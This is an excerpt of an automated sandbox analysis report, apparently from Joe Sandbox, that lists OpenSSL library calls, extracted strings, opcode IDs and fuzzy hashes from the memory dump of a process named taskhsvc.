                                                            • Opcode Fuzzy Hash: 397ec38f9f0a19682e08dc4f338f0e8cbd08d2b957ffefb53b95e5477d797e51
                                                            • Instruction Fuzzy Hash: 08E126B56097028BD700DF29C58035BBBF1BF8539CF22891CE8988BB44D775E5468F92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_free$F_strdupR_put_error$O_mallocsk_push
                                                            • String ID: A$f$i
                                                            • API String ID: 538425094-87896389
                                                            • Opcode ID: 7a9c8ba8d722af5d66d439dfb56055cbf8b0d65237c103b1afb8f154cb160abe
                                                            • Instruction ID: b62314890443f330f147354300599f723debfe66703565783f44e4e2286ff5dc
                                                            • Opcode Fuzzy Hash: 7a9c8ba8d722af5d66d439dfb56055cbf8b0d65237c103b1afb8f154cb160abe
                                                            • Instruction Fuzzy Hash: BF918EB12087019BD700AF66C54035BBFF4EF84788F11D91DE9D88BB41EB7AD4498B92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • PEM_bytes_read_bio.LIBEAY32 ref: 6CF2F03B
                                                              • Part of subcall function 6CF2BB70: PEM_read_bio.LIBEAY32 ref: 6CF2BC13
                                                            • d2i_X509_SIG.LIBEAY32 ref: 6CF2F093
                                                              • Part of subcall function 6CF062A0: ASN1_item_d2i.LIBEAY32 ref: 6CF062CD
                                                            • PKCS8_decrypt.LIBEAY32 ref: 6CF2F0DA
                                                              • Part of subcall function 6CF6F880: PKCS8_PRIV_KEY_INFO_it.LIBEAY32 ref: 6CF6F8A1
                                                              • Part of subcall function 6CF6F880: PKCS12_item_decrypt_d2i.LIBEAY32 ref: 6CF6F8C3
                                                            • ERR_put_error.LIBEAY32 ref: 6CF2F147
                                                            • CRYPTO_free.LIBEAY32 ref: 6CF2F155
                                                            • OPENSSL_cleanse.LIBEAY32 ref: 6CF2F169
                                                            • CRYPTO_free.LIBEAY32 ref: 6CF2F175
                                                            • EVP_PKEY_asn1_find_str.LIBEAY32 ref: 6CF2F1CB
                                                            • d2i_PrivateKey.LIBEAY32 ref: 6CF2F200
                                                            • d2i_PKCS8_PRIV_KEY_INFO.LIBEAY32 ref: 6CF2F227
                                                            • EVP_PKCS82PKEY.LIBEAY32 ref: 6CF2F239
                                                            • EVP_PKEY_free.LIBEAY32 ref: 6CF2F251
                                                            • PKCS8_PRIV_KEY_INFO_free.LIBEAY32 ref: 6CF2F25F
                                                            • ERR_put_error.LIBEAY32 ref: 6CF2F297
                                                            • X509_SIG_free.LIBEAY32 ref: 6CF2F29F
                                                            • PEM_def_callback.LIBEAY32 ref: 6CF2F2C0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_freed2i_$R_put_errorX509_$G_freeL_cleanseM_bytes_read_bioM_def_callbackM_read_bioN1_item_d2iO_itPrivateS12_item_decrypt_d2iS8_decryptY_asn1_find_strY_free
                                                            • String ID: ENCRYPTED PRIVATE KEY$P$PRIVATE KEY$h$u
                                                            • API String ID: 275417579-1157398782
                                                            • Opcode ID: f243da9bfc3322ec75bdf0a2dd21a613652b886c920c0cc500f8d70dc83d2da1
                                                            • Instruction ID: cea0e354f722d1cac56beef5090f18b1f8e72fcc80cf622eabf24ca271306866
                                                            • Opcode Fuzzy Hash: f243da9bfc3322ec75bdf0a2dd21a613652b886c920c0cc500f8d70dc83d2da1
                                                            • Instruction Fuzzy Hash: 39A1FEB5A193019FD750DFA9C18064BFBF0AF89744F11892EE99887710E739E8488B93
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • X509_check_private_key.LIBEAY32 ref: 6CF74D08
                                                              • Part of subcall function 6CF35790: X509_PUBKEY_get.LIBEAY32 ref: 6CF357C1
                                                              • Part of subcall function 6CF35790: EVP_PKEY_cmp.LIBEAY32 ref: 6CF357D7
                                                              • Part of subcall function 6CF35790: EVP_PKEY_free.LIBEAY32 ref: 6CF357FF
                                                            • EVP_sha1.LIBEAY32 ref: 6CF74D2F
                                                            • X509_pubkey_digest.LIBEAY32 ref: 6CF74D4F
                                                              • Part of subcall function 6CF434C0: X509_get0_pubkey_bitstr.LIBEAY32 ref: 6CF434E4
                                                              • Part of subcall function 6CF434C0: EVP_Digest.LIBEAY32 ref: 6CF4350D
                                                            • ASN1_OCTET_STRING_new.LIBEAY32 ref: 6CF74D54
                                                              • Part of subcall function 6CF16DE0: ASN1_item_new.LIBEAY32(?,?,?,?,?,?,?,?,?,?,6CE3F4F3), ref: 6CF16DF5
                                                            • ASN1_OCTET_STRING_set.LIBEAY32 ref: 6CF74D73
                                                            • X509_get_subject_name.LIBEAY32 ref: 6CF74D97
                                                            • X509_NAME_set.LIBEAY32 ref: 6CF74DA6
                                                            • X509_gmtime_adj.LIBEAY32 ref: 6CF74DD3
                                                            • OCSP_RESPDATA_it.LIBEAY32 ref: 6CF74DE8
                                                            • ASN1_item_sign.LIBEAY32 ref: 6CF74E14
                                                            • sk_new_null.LIBEAY32 ref: 6CF74E37
                                                            • sk_push.LIBEAY32 ref: 6CF74E5B
                                                            • CRYPTO_add_lock.LIBEAY32 ref: 6CF74E92
                                                            • sk_num.LIBEAY32 ref: 6CF74ECF
                                                            • sk_value.LIBEAY32 ref: 6CF74EE3
                                                            • sk_push.LIBEAY32 ref: 6CF74EF8
                                                            • ERR_put_error.LIBEAY32 ref: 6CF74F4B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: X509_sk_push$A_itDigestE_setG_newG_setN1_item_newN1_item_signO_add_lockP_sha1R_put_errorX509_check_private_keyX509_get0_pubkey_bitstrX509_get_subject_nameX509_gmtime_adjX509_pubkey_digestY_cmpY_freeY_getsk_new_nullsk_numsk_value
                                                            • String ID: (UNKNOWN)$h$n$revoked$unknown
                                                            • API String ID: 3913213466-2775805227
                                                            • Opcode ID: 081da779870d737aee9e9684193c5fea204913ecb510adfccffdfaa91476623a
                                                            • Instruction ID: 162cbb50b2e6a459b7237442412a17b6a30943803622bb8b584e7800f10e562b
                                                            • Opcode Fuzzy Hash: 081da779870d737aee9e9684193c5fea204913ecb510adfccffdfaa91476623a
                                                            • Instruction Fuzzy Hash: 9C61D0B05097018FD7119F25D28439ABBE0BF88318F11891EE9D897B50EB75E844CFA2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: M_freeR_put_error
                                                            • String ID: r$v
                                                            • API String ID: 177401054-3770306691
                                                            • Opcode ID: 740f5ac988f84e595169faa2b94fe41cae34e12164b4c0d23ecd92815542bf57
                                                            • Instruction ID: f3f14442d27f4242fdc60098d732dd42eb80090fcb200f9cd551563c05881bcd
                                                            • Opcode Fuzzy Hash: 740f5ac988f84e595169faa2b94fe41cae34e12164b4c0d23ecd92815542bf57
                                                            • Instruction Fuzzy Hash: 1BE128756087018FDB14DF29C280A4ABBF1FF89318F029A5DEA689B311D730E945CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • PKCS7_SIGNER_INFO_new.LIBEAY32 ref: 6CF64CCE
                                                              • Part of subcall function 6CF636F0: ASN1_item_new.LIBEAY32 ref: 6CF63705
                                                            • ASN1_INTEGER_set.LIBEAY32 ref: 6CF64CE6
                                                              • Part of subcall function 6CEFC200: CRYPTO_free.LIBEAY32 ref: 6CEFC22E
                                                              • Part of subcall function 6CEFC200: CRYPTO_malloc.LIBEAY32 ref: 6CEFC24A
                                                            • PKCS7_SIGNER_INFO_free.LIBEAY32 ref: 6CF64CF2
                                                              • Part of subcall function 6CF63720: ASN1_item_free.LIBEAY32 ref: 6CF6373D
                                                            • X509_get_issuer_name.LIBEAY32 ref: 6CF64D23
                                                            • X509_NAME_set.LIBEAY32 ref: 6CF64D32
                                                            • ASN1_STRING_free.LIBEAY32 ref: 6CF64D44
                                                            • X509_get_serialNumber.LIBEAY32 ref: 6CF64D53
                                                            • ASN1_STRING_dup.LIBEAY32 ref: 6CF64D5B
                                                            • CRYPTO_add_lock.LIBEAY32 ref: 6CF64D91
                                                            • EVP_MD_type.LIBEAY32 ref: 6CF64D9C
                                                            • OBJ_nid2obj.LIBEAY32 ref: 6CF64DA4
                                                            • X509_ALGOR_set0.LIBEAY32 ref: 6CF64DC3
                                                            • PKCS7_add_signer.LIBEAY32 ref: 6CF64E0A
                                                            • EVP_PKEY_get_default_digest_nid.LIBEAY32 ref: 6CF64E2B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_freeX509_$D_typeE_setG_dupG_freeJ_nid2objN1_item_freeN1_item_newNumberO_add_lockO_mallocO_newR_setR_set0S7_add_signerX509_get_issuer_nameX509_get_serialY_get_default_digest_nid
                                                            • String ID: A$~
                                                            • API String ID: 2913225942-3360457592
                                                            • Opcode ID: 7c9bde7fe78ec3eb58dd63fa6e152f61ea9bddd18cf444132536b36f4393237a
                                                            • Instruction ID: 0140ec34c00805f3abee9d64e26e9903b4be08d4fa7bc0d7d38d7f6f25a63502
                                                            • Opcode Fuzzy Hash: 7c9bde7fe78ec3eb58dd63fa6e152f61ea9bddd18cf444132536b36f4393237a
                                                            • Instruction Fuzzy Hash: DE61F1B5509701AFD700EF26C59469FBBF0BF85348F11881CE9A88BB40D779E948CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: X_new__stack_chk_fail
                                                            • String ID: g$g
                                                            • API String ID: 3713409240-2431062506
                                                            • Opcode ID: 339c0f09c39900dfff33dac1dbecdab269f13034004ba709a01f619bc6336e80
                                                            • Instruction ID: b32980317b355dcab07b8c026ac6b12a94e9e1d13e34e2d33722db6953d7bc72
                                                            • Opcode Fuzzy Hash: 339c0f09c39900dfff33dac1dbecdab269f13034004ba709a01f619bc6336e80
                                                            • Instruction Fuzzy Hash: 38D114715087009FC704DF29C685A1BBBF5BF89318F26891CEAA8AB740D731E905CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: sk_value$sk_num$N1_object_sizeN1_put_object
                                                            • String ID: A
                                                            • API String ID: 1295365991-3554254475
                                                            • Opcode ID: 33cc6a6e41c6d89713e82dd4966a83c329e23e72de837ad2b8315a413de11620
                                                            • Instruction ID: d4e7d2de122e9517ce4cd6668bddd276204de952680b9a75d2119bb213539efc
                                                            • Opcode Fuzzy Hash: 33cc6a6e41c6d89713e82dd4966a83c329e23e72de837ad2b8315a413de11620
                                                            • Instruction Fuzzy Hash: C9B103B56097019FC350EF28C18065EFBF1BF89758F218A1DE8E997750D731A946CB82
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3026693033.000000006CE5C000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_free$O_malloc$R_put_error$N_div_wordN_dupN_freeN_num_bits
                                                            • String ID: A$A$gfff$h$h$}$}
                                                            • API String ID: 3061569079-2322673421
                                                            • Opcode ID: a924b298c8a142ed33b7eebef96a6de5679612187d7e37ef419da826ad873096
                                                            • Instruction ID: d6a2ea52ffe2b98927fea12f8419e587ec8d9b9c682b610e9827c25433651b45
                                                            • Opcode Fuzzy Hash: a924b298c8a142ed33b7eebef96a6de5679612187d7e37ef419da826ad873096
                                                            • Instruction Fuzzy Hash: B271ABB16083018FD721DF29C58434ABBF1EF99348F258A2DE9989BB40D774E945CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,6CF42105), ref: 6CF46E79
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: __stack_chk_fail
                                                            • String ID:
                                                            • API String ID: 4216919130-0
                                                            • Opcode ID: 41f995773ac75e5154bf3f9026be0bf478459345a3e4eaef953098ae9aa43cb8
                                                            • Instruction ID: 78a0965e8e2e182852c94b1c53288e7ad4097da451029d2ff04afca2817d1938
                                                            • Opcode Fuzzy Hash: 41f995773ac75e5154bf3f9026be0bf478459345a3e4eaef953098ae9aa43cb8
                                                            • Instruction Fuzzy Hash: 1091F9716197028FDB00DF29C58065BBBF4BF85318F12892EE9A4CBB01E735E945CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: X_init
                                                            • String ID: A
                                                            • API String ID: 208422987-3554254475
                                                            • Opcode ID: 2aff4eabbb2160c932062dd3c644d6cb8b0b34ed5aa886e6b1765f81c2790a12
                                                            • Instruction ID: 7060d9795a8d57728c1d00c117d58ccf18b34975c403981fb1cb34ee1d691a38
                                                            • Opcode Fuzzy Hash: 2aff4eabbb2160c932062dd3c644d6cb8b0b34ed5aa886e6b1765f81c2790a12
                                                            • Instruction Fuzzy Hash: E381C5B56097419FD700DF65C58475ABBF0BF84348F22892DE4A88BB10E779E849CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • sk_pop_free.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CF3B146), ref: 6CF467A6
                                                            • sk_new_null.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CF3B146), ref: 6CF467B3
                                                            • sk_num.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CF3B146), ref: 6CF46809
                                                            • sk_pop_free.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CF3B146), ref: 6CF46843
                                                            • sk_deep_copy.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CF3B146), ref: 6CF4686F
                                                            • BUF_strdup.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CF3B146), ref: 6CF468E2
                                                            • strlen.MSVCRT ref: 6CF468EE
                                                            • CRYPTO_free.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6CF3B146), ref: 6CF4690F
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: sk_pop_free$F_strdupO_freesk_deep_copysk_new_nullsk_numstrlen
                                                            • String ID:
                                                            • API String ID: 2820809294-0
                                                            • Opcode ID: 7e4c3cc7282ab07e67d12ccfd0f02bd01d2b95d8e59e652ecf8cbc70a4cf5cfa
                                                            • Instruction ID: c9bcefc417b92b5adbab12a848cfe476a26b43ac847b142422166caa57fe77d5
                                                            • Opcode Fuzzy Hash: 7e4c3cc7282ab07e67d12ccfd0f02bd01d2b95d8e59e652ecf8cbc70a4cf5cfa
                                                            • Instruction Fuzzy Hash: 83F11575A097058BDB08DF25C08065BBBF0BF48718F15C66DE8A8DBB46E770E941CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error$ErrorLastO_sock_should_retryaccept
                                                            • String ID: d$o
                                                            • API String ID: 948164845-2625251201
                                                            • Opcode ID: 7f6c4f1a2ca492f3b28b3f2a6be7f2e8367074e9e39cd93157f167f45ba12c6e
                                                            • Instruction ID: 2b8cf31ff0e2d3725383fa2373644db13c5ae23bd238df8c22d6a0c2c64235dc
                                                            • Opcode Fuzzy Hash: 7f6c4f1a2ca492f3b28b3f2a6be7f2e8367074e9e39cd93157f167f45ba12c6e
                                                            • Instruction Fuzzy Hash: 068147B16087419FDB10DF69C68430ABBF0BF85318F218A1DE5B88B790D379E5498B93
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • EC_GF2m_simple_method.LIBEAY32 ref: 6CE8AC72
                                                            • EC_GROUP_new.LIBEAY32 ref: 6CE8AC7A
                                                              • Part of subcall function 6CE83540: CRYPTO_malloc.LIBEAY32 ref: 6CE8357E
                                                              • Part of subcall function 6CE83540: BN_init.LIBEAY32 ref: 6CE835AD
                                                              • Part of subcall function 6CE83540: BN_init.LIBEAY32 ref: 6CE835B8
                                                            • EC_GROUP_set_curve_GF2m.LIBEAY32 ref: 6CE8AC9A
                                                            • EC_GROUP_clear_free.LIBEAY32 ref: 6CE8ACD3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: N_init$F2m_simple_methodO_mallocP_clear_freeP_newP_set_curve_
                                                            • String ID: A$|
                                                            • API String ID: 2360485117-641917524
                                                            • Opcode ID: 3bac6e9a5c5e036c486bc501e177f22acef528309d5c191562ae790909298e47
                                                            • Instruction ID: ac20a79042ec8e7827ca96111f99200311d6c58c3ab1f6b63bfef6fddb308185
                                                            • Opcode Fuzzy Hash: 3bac6e9a5c5e036c486bc501e177f22acef528309d5c191562ae790909298e47
                                                            • Instruction Fuzzy Hash: F9A169B158A3018FD700DF29C44024BBBF1BF85348F658D2DE99887B90E779E945CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: R_put_error
                                                            • String ID: {
                                                            • API String ID: 1767461275-366298937
                                                            • Opcode ID: a9f8d35ead24d4391ee51c99afc12aa4197e01bca320c137626611225592003f
                                                            • Instruction ID: 92300959274f493e55419c46e32e7206c1f43f940d948b4c3032320c30a24c00
                                                            • Opcode Fuzzy Hash: a9f8d35ead24d4391ee51c99afc12aa4197e01bca320c137626611225592003f
                                                            • Instruction Fuzzy Hash: 749119755187009FDB00DF69C68060BBBF1BB8A318F128A1CE6B89B750D771E906CF96
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ENGINE_get_pkey_meth.LIBEAY32 ref: 6CEF4CDD
                                                            • ERR_put_error.LIBEAY32 ref: 6CEF4ED7
                                                            • ENGINE_init.LIBEAY32 ref: 6CEF4CC9
                                                              • Part of subcall function 6CEBD570: CRYPTO_lock.LIBEAY32(?,?,?,?,00000000,?,6CE9E6CC), ref: 6CEBD5AB
                                                              • Part of subcall function 6CEBD570: CRYPTO_lock.LIBEAY32(?,?,?,?,00000000,?,6CE9E6CC), ref: 6CEBD5E2
                                                            • CRYPTO_malloc.LIBEAY32 ref: 6CEF4D03
                                                            • CRYPTO_add_lock.LIBEAY32 ref: 6CEF4D55
                                                            • ENGINE_get_pkey_meth_engine.LIBEAY32 ref: 6CEF4DA7
                                                            • sk_find.LIBEAY32 ref: 6CEF4DD2
                                                            • OBJ_bsearch_.LIBEAY32 ref: 6CEF4E06
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_lock$E_get_pkey_methE_get_pkey_meth_engineE_initJ_bsearch_O_add_lockO_mallocR_put_errorsk_find
                                                            • String ID: &
                                                            • API String ID: 3606908186-1010288
                                                            • Opcode ID: 9765d706fb986dbfa40b6276fc34f6735f914ca8336ec925bac9dc01cf024477
                                                            • Instruction ID: cddaf7764979d5b04de92287181b3408344b66a767783bae872468e364b19fa4
                                                            • Opcode Fuzzy Hash: 9765d706fb986dbfa40b6276fc34f6735f914ca8336ec925bac9dc01cf024477
                                                            • Instruction Fuzzy Hash: 66611AB16197029FE7009F25C68475BBBF4BF81348F61882DD8A88BB40E779D506CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • PKCS7_new.LIBEAY32 ref: 6CF6ADFE
                                                              • Part of subcall function 6CF63470: ASN1_item_new.LIBEAY32 ref: 6CF63485
                                                            • PKCS7_set_type.LIBEAY32 ref: 6CF6AE18
                                                              • Part of subcall function 6CF64420: OBJ_nid2obj.LIBEAY32 ref: 6CF6443B
                                                            • OBJ_nid2sn.LIBEAY32 ref: 6CF6AE28
                                                            • EVP_get_cipherbyname.LIBEAY32 ref: 6CF6AE30
                                                              • Part of subcall function 6CEE97A0: OBJ_NAME_get.LIBEAY32 ref: 6CEE97BD
                                                            • PKCS5_pbe2_set.LIBEAY32 ref: 6CF6AE50
                                                              • Part of subcall function 6CF27C60: EVP_CIPHER_type.LIBEAY32 ref: 6CF27CAB
                                                              • Part of subcall function 6CF27C60: ASN1_item_new.LIBEAY32 ref: 6CF27CC3
                                                              • Part of subcall function 6CF27C60: OBJ_nid2obj.LIBEAY32 ref: 6CF27CDC
                                                              • Part of subcall function 6CF27C60: ASN1_TYPE_new.LIBEAY32 ref: 6CF27CE3
                                                              • Part of subcall function 6CF27C60: EVP_CIPHER_iv_length.LIBEAY32 ref: 6CF27CF6
                                                              • Part of subcall function 6CF27C60: EVP_CIPHER_iv_length.LIBEAY32 ref: 6CF27D06
                                                              • Part of subcall function 6CF27C60: RAND_bytes.LIBEAY32 ref: 6CF27D1D
                                                              • Part of subcall function 6CF27C60: EVP_CIPHER_CTX_init.LIBEAY32 ref: 6CF27D31
                                                              • Part of subcall function 6CF27C60: EVP_CipherInit_ex.LIBEAY32 ref: 6CF27D5D
                                                              • Part of subcall function 6CF27C60: EVP_CIPHER_param_to_asn1.LIBEAY32 ref: 6CF27D74
                                                              • Part of subcall function 6CF27C60: EVP_CIPHER_CTX_cleanup.LIBEAY32 ref: 6CF27D8F
                                                              • Part of subcall function 6CF27C60: X509_ALGOR_free.LIBEAY32 ref: 6CF27DA9
                                                              • Part of subcall function 6CF27C60: PKCS5_pbkdf2_set.LIBEAY32 ref: 6CF27DD1
                                                              • Part of subcall function 6CF27C60: X509_ALGOR_new.LIBEAY32 ref: 6CF27DE0
                                                              • Part of subcall function 6CF27C60: ASN1_TYPE_new.LIBEAY32 ref: 6CF27DEF
                                                              • Part of subcall function 6CF27C60: OBJ_nid2obj.LIBEAY32 ref: 6CF27E06
                                                            • X509_ALGOR_free.LIBEAY32 ref: 6CF6AE6B
                                                            • ASN1_STRING_free.LIBEAY32 ref: 6CF6AE7F
                                                            • PKCS12_SAFEBAGS_it.LIBEAY32 ref: 6CF6AE8A
                                                            • PKCS12_item_i2d_encrypt.LIBEAY32 ref: 6CF6AEB6
                                                            • PKCS5_pbe_set.LIBEAY32 ref: 6CF6AEEB
                                                            • ERR_put_error.LIBEAY32 ref: 6CF6AF27
                                                            • PKCS7_free.LIBEAY32 ref: 6CF6AF2F
                                                            • ERR_put_error.LIBEAY32 ref: 6CF6AF67
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: J_nid2objX509_$E_newN1_item_newR_freeR_iv_lengthR_put_error$CipherD_bytesE_getG_freeInit_exJ_nid2snP_get_cipherbynameR_newR_param_to_asn1R_typeS12_S12_item_i2d_encryptS5_pbe2_setS5_pbe_setS5_pbkdf2_setS7_freeS7_newS7_set_typeS_itX_cleanupX_init
                                                            • String ID: g$s
                                                            • API String ID: 2116476282-2319304087
                                                            • Opcode ID: f69c3745b70318d09c7753503a70dc62f5096e034d3a3a1286a48f2a517f69d7
                                                            • Instruction ID: a54a286c5ce9692af7a4fa759f5104064c7eb6d4854ab692883f69d300f7aec5
                                                            • Opcode Fuzzy Hash: f69c3745b70318d09c7753503a70dc62f5096e034d3a3a1286a48f2a517f69d7
                                                            • Instruction Fuzzy Hash: 1E51C1B19097019FD300DF26C18464BBBF0BF89758F12891DE8989BB50D779E949CF92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ERR_put_error.LIBEAY32(?,?,?,?,?,?,?,?,00000000,6CEF90CE), ref: 6CEF8CED
                                                            • CRYPTO_free.LIBEAY32(?,?,?,?,?,?,?,?,00000000,6CEF90CE), ref: 6CEF8EBC
                                                            • CRYPTO_free.LIBEAY32(?,?,?,?,?,?,?,?,00000000,6CEF90CE), ref: 6CEF8ED3
                                                            • CRYPTO_free.LIBEAY32(?,?,?,?,?,?,?,?,00000000,6CEF90CE), ref: 6CEF8EFE
                                                            • CRYPTO_free.LIBEAY32(?,?,?,?,?,?,?,?,00000000,6CEF90CE), ref: 6CEF8FBC
                                                            • ERR_put_error.LIBEAY32(?,?,?,?,?,?,?,?,00000000,6CEF90CE), ref: 6CEF8FF3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_free$R_put_error
                                                            • String ID: A${
                                                            • API String ID: 1631441854-3089528823
                                                            • Opcode ID: 7ab55e2ac140f295698c7b0af565a1576566371a1683b59ff46ab5e939b39bb5
                                                            • Instruction ID: c47049aa06b4df4ffa5b541be652eeea97dcd7b14127794ac5228a70de6916a2
                                                            • Opcode Fuzzy Hash: 7ab55e2ac140f295698c7b0af565a1576566371a1683b59ff46ab5e939b39bb5
                                                            • Instruction Fuzzy Hash: AEC138B16093058FE714CF26C58471BBBF0BF86318F258A5EE4A88B750D375D94ACB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000056.00000002.3027141212.000000006CE7B000.00000040.00000001.01000000.0000000F.sdmp, Offset: 6CE20000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_86_2_6ce20000_taskhsvc.jbxd
                                                            Similarity
                                                            • API ID: O_lock$O_snprintfstrlen
                                                            • String ID: @
                                                            • API String ID: 1723301650-2766056989
                                                            • Opcode ID: 12a7f8b0226f6cafa48f786183e43e4805f833575672391a97f6a1e4b7bc3c75
